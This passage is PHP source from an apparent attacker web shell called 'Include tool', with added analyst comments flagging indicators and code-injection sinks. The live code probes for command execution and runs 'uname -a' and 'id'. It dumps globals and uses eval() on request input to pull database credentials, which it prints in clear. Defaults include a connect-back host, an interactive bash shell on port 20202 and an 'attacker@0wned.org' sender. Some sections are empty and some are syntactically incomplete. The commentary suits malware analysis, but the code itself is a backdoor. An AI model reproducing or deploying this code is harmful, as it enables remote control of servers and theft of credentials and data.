0,
"filecopy" => 0,
"fileedit" => 0,
"showsource" => 0,
"snoop" => 0,
"cmdln" => 0,
"connectback" => 0,
"phpshell" => 0,
"servicecheck" => 0,
"mysqlaccess" => 0,
"mail" => 0,
"env" => 0,
"phpenv" => 0,
"phpinfo" => 0,
"dumpvars" => 0,
"debugscript" => 0,
"syslog" => 0
);
# init navigation
# Every key of $ArrFuncs (the feature flags listed above) is turned into a
# global variable of the same name via variable-variables ($$key) and set to
# its default of 0 unless it already exists. Because the script reads
# request-derived globals such as $QUERY_STRING and $PHP_SELF directly, the
# flags are presumably expected to arrive as globals from the request
# (register_globals style) -- this copy does not show where; verify.
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;
# set default values
# Per-feature input defaults. Like $ArrFuncs below, every key becomes a
# global of the same name unless one already exists, so each of these is a
# request-overridable value. The literal defaults (mail_from, the 20202
# ports, the bash launch line) are fixed in this copy and are useful as
# static indicators when hunting for this tool.
$ArrDefaults = array(
"filecopy_source" => "http://...",
"filecopy_dest" => getcwd(),
"cmdcall" => "",
"editfile" => getcwd(),
"editcontent" => "",
"chdir" => ".",
"vsource" => $SCRIPT_FILENAME, # register_globals-style server variable
"mail_from" => "attacker@0wned.org",
"mail_to" => "",
"mail_subject" => "",
"mail_attach_source" => "http://....",
"mail_attach_appear" => "filename...",
"mail_content_type" => "image/png",
"mail_msg" => "",
"tcpports" => "21 22 23 25 80 110",
"timeout" => 5,
"miniinc_loc" => getcwd() . "/miniinc.php",
"incdbhost" => "localhost",
"cbhost" => $_SERVER['REMOTE_ADDR'], # defaults to the requesting client's address
"cbport" => 20202,
"cbtempdir" => "/tmp",
"cbcompiler" => "gcc",
"phpshellapp" => "export TERM=xterm; bash -i",
"phpshellhost" => "0.0.0.0",
"phpshellport" => "20202"
);
# init defaults
# Same isset() guard as for the flags: an existing global wins over the default.
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;
# define executable functions
# Human-readable labels indexed by $emeth, the execution-method number that
# test_cmd_shell() returns further down. 0 means no usable method was found.
$Mstr = array(
0 => "No execute functions available!",
1 => "passthru()",
2 => "system()",
3 => "backticks",
4 => "proc_open()",
5 => "exec()"
);
# clean request to avoid uri monster
# Rebuild a compact query string ($SREQ) for the navigation links. Primary
# source is $REQUESTS (not defined in this part of the file; presumably a
# key/value map built earlier). The first pair is always kept; for the rest
# the filter `$val!=0 || $val!="" || $val!="0"` is true for every value
# (no value equals all three at once), so nothing is actually dropped --
# this looks like it was meant to be &&.
$SREQ = "";
$reqdat = array();
$tmpCount=0;
foreach($REQUESTS as $key => $val){
if($tmpCount==0) $reqdat[] = $key."=".$val;
else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
$tmpCount++;
}
$SREQ = implode("&", $reqdat);
$tmpCount=0;
# Fallback: parse the raw $QUERY_STRING global the same way. A segment
# without "=" leaves $tmp_val[1] undefined (notice, empty value).
if($SREQ=="") {
$tmp_req = array();
$tmp_qry = explode("&", $QUERY_STRING);
foreach($tmp_qry as $key => $val) {
$tmp_val = explode("=", $val);
if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
$tmpCount++;
}
$SREQ = implode("&", $tmp_req);
}
# Carry the docroot path through; the ";" after "&path" is probably an
# HTML-entity artefact of how this copy was extracted rather than intended.
if(isset($path['docroot'])) $SREQ .= "&path;[docroot]=" . $path['docroot'];
# set some defaults to avaoid errors
$is_file = array();
$is_dir = array();
$is_w_dir = array();
$is_w_file = array();
$emeth=0; # execution method, 0 = none detected yet
# Normalise $chdir (request-overridable, default "."): anything shorter than
# two characters other than "/" is replaced by the current directory, double
# slashes are collapsed and a trailing slash is guaranteed. No other
# restriction is applied to the path.
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
$chdir = str_replace("//", "/", $chdir);
if(substr($chdir, -1) != "/") $chdir .= "/";
##
# Setup wether to use PHP_SELF or SCRIPT_NAME
# Prefer PHP_SELF when it differs from SCRIPT_NAME (e.g. extra path info),
# then build an absolute http:// URL for the tool's own links from the
# register_globals-style $SERVER_NAME / $SERVER_PORT variables.
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
else $MyLoc = $SCRIPT_NAME;
# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
# This is a list of internal inc.inc vars that do not get displayed
# inside the dumpvars function (poss for a debug func later?)
# Plain list of variable names; the first entry looks like a filler value.
# It is passed by name to ddb() in the debugscript section below.
$DebugArr = array(
'ARHGFDGFGASDFG',
'safe_mode',
'register_globals',
'magic_quotes_gpc',
'txt',
'lang',
'SM',
'RG',
'MQ',
'ArrFuncs',
'val',
'key',
'env',
'phpenv',
'phpinfo',
'debugscript',
'filecopy',
'fileedit',
'showsource',
'snoop',
'mail',
'cmdln',
'syslog',
'servicecheck',
'dropinc',
'mysqlaccess',
'ArrDefaults',
'filecopy_source',
'filecopy_dest',
'cmdcall',
'editfile',
'editcontent',
'chdir',
'vsource',
'mail_from',
'mail_to',
'mail_subject',
'mail_attach_source',
'mail_attach_appear',
'mail_content_type',
'mail_msg',
'tcpports',
'timeout',
'miniinc_loc',
'incdbhost',
'Mstr',
'SREQ',
'reqdat',
'tmpCount',
'is_file',
'is_dir',
'is_w_dir',
'is_w_file',
'emeth',
'MyLoc',
'dumpvarsare',
'DebugArr',
'cbtempdir',
'cbcompiler',
'cbhost',
'cbport',
'phpshelltype',
'phpshellapp',
'phpshellhost',
'phpshellport'
);
# activate syslog entry
# The body is entirely commented out, so in this copy the $syslog flag
# writes nothing to syslog; its only visible effect is the status label in
# the header further down.
if($syslog == 1)
{
# openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
# drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
}
###############################################################################
#
# start include output
#
###############################################################################
# All page output is accumulated in $strOutput and emitted at the very end
# (also base64-encoded there), rather than echoed section by section.
$strOutput = "";
$strOutput .= "
Include tool
PHP Version: " . phpversion() . " |
safe_mode: $SM |
register_globals: $RG |
magic_quotes_gpc: $MQ |
syslogging: ";
# Status label for the syslog flag. Note the mapping: syslog==1 prints the
# 'off' text and anything else prints 'on', which reads as inverted relative
# to the flag's name -- may be deliberate, may be a bug; confirm against $txt.
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
$strOutput .= "
";
# One navigation toggle per feature flag; make_switch() is defined elsewhere
# (presumably it builds a link using $MyLoc and $SREQ -- verify).
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key);
###############################################################################
# test cmd shell environment
###############################################################################
# env=1: probe for a working command-execution method, then run two host
# commands ("uname -a" and "id") through Mexec() and print the results.
# test_cmd_shell() and Mexec() are defined elsewhere; the "=&" takes a
# reference to a function's return value, which PHP only tolerates with a
# notice. From a detection standpoint these two commands run whenever this
# section is reached and a method is found.
if($env == 1) {
$strOutput .= "
cmd infos |
test using pwd | "; $emeth =& test_cmd_shell(); $strOutput .= " | ";
if($emeth==0) {
$strOutput .= "$Mstr[$emeth] | ";
} else {
$strOutput .= "exec method | $Mstr[$emeth] |
uname -a | " . Mexec("uname -a", $emeth) . " |
id | " . Mexec("id", $emeth) . " |
";
}
}
###############################################################################
# test php environment
###############################################################################
# phpenv=1: report the POSIX identity of the PHP process (uname fields, the
# script owner via get_current_user(), uid/euid/gid), each guarded by
# function_exists() so a disabled posix extension degrades to a message.
# each() was removed in PHP 8.0, so the uname loop only runs on older PHP.
if($phpenv == 1) {
$strOutput .= "php short infos |
posix infos | ";
if(function_exists('posix_uname')) {
$posix_uname = posix_uname();
while (list($info, $value) = each ($posix_uname)) {
$strOutput .= " $info | $value | ";
}
} else {
$strOutput .= "posix_uname not available";
}
$strOutput .= "current script user | " . get_current_user() . " | ";
if(function_exists('posix_getuid')) $strOutput .= " getuid | " . posix_getuid() . " | ";
else $strOutput .= "posix_getuid not available";
if(function_exists('posix_geteuid')) $strOutput .= " geteuid | " . posix_geteuid() . " | ";
else $strOutput .= "posix_geteuid not available";
if(function_exists('posix_getgid')) $strOutput .= " getgid | " . posix_getgid() . " | ";
else $strOutput .= "posix_getgid not available";
$strOutput .= " ";
}
###############################################################################
# dump variables
###############################################################################
# dumpvars=1: dd() is defined elsewhere and is given the name "GLOBALS",
# so this presumably renders the global symbol table (the $DebugArr list
# above is described as the names it should hide) -- verify in dd().
if($dumpvars == 1) {
$strOutput .= "dump variables |
" . dd("GLOBALS") . " |
";
}
###############################################################################
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
# debugscript=1: unlike the other sections this one leaves PHP mode ("?>")
# and echoes directly instead of appending to $strOutput, which is what the
# "NEEDS MODIFYING FOR B64 STATUS" note above refers to. In this extracted
# copy the HTML and the re-opening "<?php" tag around ddb("DebugArr") are
# missing, so the lines below are not syntactically complete as shown.
if($debugscript == 1) { ?>
debug script |
ddb("DebugArr"); ?>
|
}
###############################################################################
# copy file
###############################################################################
# filecopy / fileedit / cmdln / mail: in this copy each section appends an
# empty string. The original presumably held an HTML form (inputs for the
# $ArrDefaults keys with the matching prefix) that was stripped during
# extraction, so the actual actions are not visible here.
if($filecopy == 1) {
$strOutput .= "";
}
###############################################################################
# edit file
###############################################################################
if($fileedit == 1) {
$strOutput .= "
";
}
###############################################################################
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
# cmdln=1 re-probes the execution method into $emeth before (what was) the
# command form; $cmdcall is the request-overridable default for the input.
if($cmdln == 1) {
$emeth = test_cmd_shell();
$strOutput .= "";
}
###############################################################################
# sending mime mail
###############################################################################
if($mail == 1) {
$strOutput .= "";
}
###############################################################################
# drop mini inc handling
###############################################################################
# dropinc / connectback / phpshell / snoop: same situation as the sections
# above -- only the empty-string placeholders survived extraction. The
# related defaults ($miniinc_loc, $cb*, $phpshell*) are set in $ArrDefaults.
# $dropinc and $loc are not initialised anywhere in this part of the file.
if($dropinc == 1) {
if($loc!="") $miniinc_loc = $loc; # request-supplied $loc overrides the default drop path
$strOutput .= "";
}
###############################################################################
# connect C back shell handling
###############################################################################
if($connectback == 1) {
$strOutput .= "";
}
###############################################################################
# PHP shell handling
###############################################################################
if($phpshell == 1) {
$strOutput .= "";
}
###############################################################################
# snooping
###############################################################################
if($snoop == 1) {
$strOutput .= "";
}
###############################################################################
# show highlited source
###############################################################################
# Shown when the flag is set OR when $vsource was changed from its default
# ($SCRIPT_FILENAME). The single "|" is a bitwise OR on two booleans; it
# happens to give the intended result here but "||" is what was meant.
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
$strOutput .= "";
}
###############################################################################
# service check
###############################################################################
# $servhost is not initialised in this part of the file; an empty value
# falls back to "localhost". $host is not used again in the visible code.
if($servicecheck == 1) {
if($servhost!="") $host = $servhost;
else $host = "localhost";
$strOutput .= "";
}
###############################################################################
# show phpinfo
###############################################################################
# phpinfo=1 is the one section that writes straight to the response instead
# of $strOutput, so its output precedes everything buffered so far.
if($phpinfo == 1){
phpinfo();
}
######################################################################
# db stuff
######################################################################
if($mysqlaccess == 1) {
$strOutput .= "";
}
# Map the request-level incdb* values onto the short db* names used below.
# Only $incdbhost has a default in $ArrDefaults; the others are expected to
# exist as globals. $incdbvar chooses between two code paths: with it set,
# $dbh is used and the values are later dereferenced as *variable names*
# through eval(); without it, $dbH is used and the values are taken as-is.
if($incdbhost!="" && $incdbuser!="") {
if($incdbvar!="") $dbh = $incdbhost;
else $dbH = $incdbhost;
$dbu = $incdbuser;
$dbp = $incdbpass;
if($incdbsql!="") $dbs = $incdbsql;
if($incdbname!="") $dbn = $incdbname;
if($incdbtable!="") $dbt = $incdbtable;
if($incdbfile!="") $dumpfile = $incdbfile;
}
# MySQL access, "variable name" mode ($incdbvar set).
# Each eval() builds the source text  $Gdbhost = "$<value of $dbh>";  so the
# request-supplied string is used as the name of another global to read.
# Because that string is spliced into PHP source before evaluation, any
# unexpected characters in it are interpreted as code: this is a code
# injection sink and the strongest single indicator in this section.
# The resulting credentials (including the password) are also echoed in
# clear into the page. $dbn may be undefined here (only set when
# $incdbname was non-empty), in which case the first branch is taken.
if(isset($dbh)) {
$strOutput .= "mysql access | ";
eval("\$Gdbhost = \"\$$dbh\";");
eval("\$Gdbuser = \"\$$dbu\";");
eval("\$Gdbpass = \"\$$dbp\";");
eval("\$Gdbname = \"\$$dbn\";");
$strOutput .= "";
# No database name: list databases.
if($dbn=="") {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
" | " .
display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
# Free-form SQL: run it, either into a dump file or into the page.
} else if(isset($dbs)) {
$Gdbsql = $dbs;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." sql=".$Gdbsql .
" | ";
if(isset($dumpfile)) {
$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
} else {
$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
}
# Table name: dump or display its rows. The "!=" test on $dumpfile raises
# a notice when it is unset; isset() below is the real check.
} else if(isset($dbt)) {
$Gdbtabl = $dbt;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
$strOutput .= " | ";
if(isset($dumpfile)) {
$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);
} else {
$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
}
# Database only: list its tables.
} else {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
" | " .
display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
}
$strOutput .= " |
";
}
# MySQL access, literal mode ($incdbvar empty). Same four branches as the
# eval() path above (list databases / run SQL / dump or show a table / list
# tables) but the db* values are passed to the display_*/dump_* helpers
# directly. Credentials are again written to the page in clear, and $dbn
# and $dumpfile may be undefined when the corresponding incdb* value was
# empty.
if(isset($dbH)) {
$strOutput .= "mysql access | ";
if($dbn=="") {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
" | ".
display_dbs($dbH, $dbu, $dbp);
} else if(isset($dbs)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." sql=".$dbs.
" | ";
if(isset($dumpfile)) {
$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
} else {
$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
}
} else if(isset($dbt)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
$strOutput .= " | ";
if(isset($dumpfile)) {
$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);
} else {
$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
}
} else {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
" | " .
display_tables($dbH, $dbu, $dbp, $dbn);
}
$strOutput .= " |
";
}
# ODBC access, "variable name" mode. Mirrors the MySQL eval() block: the
# same request-derived strings are spliced into PHP source and evaluated,
# so the same code-injection concern applies. $Odbh is not assigned
# anywhere in this part of the file, so it must come from an earlier part
# or from the request. Only two branches exist here: rows of a table, or
# the table list via Odisplay_tables().
if(isset($Odbh)) {
$strOutput .= "odbc access | ";
eval("\$Gdbhost = \"\$$Odbh\";");
eval("\$Gdbuser = \"\$$dbu\";");
eval("\$Gdbpass = \"\$$dbp\";");
eval("\$Gdbname = \"\$$dbn\";");
$strOutput .= "";
if(isset($dbt)) {
$Gdbtabl = $dbt;
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
" | " .
display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); # note: MySQL display_rows(), not the O* variant
} else {
$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
" | " .
Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
}
$strOutput .= " |
";
}
# ODBC access, literal mode. The printed "host=" label uses $dbH while the
# actual Odisplay_* calls receive $OdbH, so the page can show a different
# host than the one queried (and $dbH may be unset here). Like $Odbh,
# $OdbH is not assigned in this part of the file.
if(isset($OdbH)) {
$strOutput .= "odbc access | ";
if(isset($dbt)) {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
" | " .
Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
} else {
$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
" | " .
Odisplay_tables($OdbH, $dbu, $dbp);
}
$strOutput .= " |
";
}
# Closing separator, then a base64 copy of the whole buffered page (this is
# presumably the "B64 status" output mode the earlier notes refer to; the
# echo that uses it starts below and is cut off in this copy). Base64 output
# of this shape is worth matching on in web-server logs, since it lets the
# tool's results pass through as an opaque blob.
$strOutput .= " |
";
$strOutputB64 = chunk_split(base64_encode($strOutput));
echo "\n";
echo '